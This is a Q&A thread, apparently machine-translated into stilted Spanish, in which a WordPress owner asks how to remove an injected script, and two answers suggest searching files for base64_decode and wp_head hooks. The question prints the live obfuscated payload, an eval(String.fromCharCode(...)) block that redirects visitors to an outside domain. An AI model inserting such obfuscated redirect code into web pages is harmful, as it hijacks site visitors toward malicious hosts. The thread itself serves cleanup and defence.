Cómo quitar malicioso eval secuencia de comandos que no se pueden encontrar en header.php

Mi WordPress sitio web ha sido hackeado y sólo soy capaz de ver el script malicioso mediante la visualización de la fuente de mi página de índice: 'view-source:mydomain.com'

El problema es que no puedo encontrar la ubicación de este código en cualquiera de mis archivos php WordPress. He ido a través de todos los archivos del núcleo (header.php, htaccess, etc.) sin ser capaz de encontrarlo.

El código se encuentra justo antes del cierre /de la etiqueta head:

<script language=javascript>eval(String.fromCharCode(32, 32, 118, 97, 114, 32, 32, 32, 116, 100, 32, 61, 32, 49, 59, 32, 118, 97, 114, 32, 122, 122, 103, 32, 61, 32, 50, 59, 32, 118, 97, 114, 32, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 108, 101, 102, 116, 111, 117, 116, 115, 105, 100, 101, 109, 121, 112, 114, 111, 102, 105, 108, 101, 46, 105, 110, 102, 111, 47, 117, 112, 116, 121, 112, 101, 63, 122, 103, 61, 49, 38, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 114, 101, 112, 108, 97, 99, 101, 40, 99, 41, 59, 119, 105, 110, 100, 111, 119, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 99, 59));</script> 

Sé que este es un redirigir malicioso, pero no sabe cómo lidiar con ella. Originalmente me ha solucionado el problema por completo volver a instalar mi web (la pérdida de algunos puestos como resultado), y lo hizo lo mejor de mi como un noob para resolver este problema antes de hacer esta pregunta.

Realmente agradecería un poco de ayuda!

2 Respuestas

  • Alexandru Filipescu
    4 de mayo de 2019

    Nunca me pasó antes, pero si que iba a suceder a mí, me gustaría descargar Total Commander y buscar en todos los archivos de secuencias de comandos malintencionadas y también pieza por pieza.

    También me gustaría tratar de eliminar todos los datos almacenados en caché en el navegador, y también borrar las cookies porque pueden almacenar piezas de código.

  • mynd
    4 de mayo de 2019

    Son altas las posibilidades de que también la salida de la <script> el bloque está codificada en su fuente de php archivos, entonces usted no será capaz de encontrar el fragmento de código anterior, sino más bien algo así como una cadena codificada en base64 en algunos de tus archivos de wordpress. Como Alexandru sugirió que podría buscar en todos los WP-Archivos de contenido para base64_decode y carfully verificación de los acontecimientos. Sin embargo, dado que teóricamente existen un sinfín de posibilidades de cómo la máscara de una cadena, esto puede ser incómodo con bastante facilidad.

    Otro enfoque podría ser la búsqueda de la wp_head gancho (-> búsqueda de 'add_action('wp_head' que se utiliza normalmente para inyectar código a su sitio web header sección. Tal vez usted encontrar la función que se llama a y responsable de la inyección de la salida anterior. En caso de detectar cualquier código de aspecto extraño, que lo ponga aquí.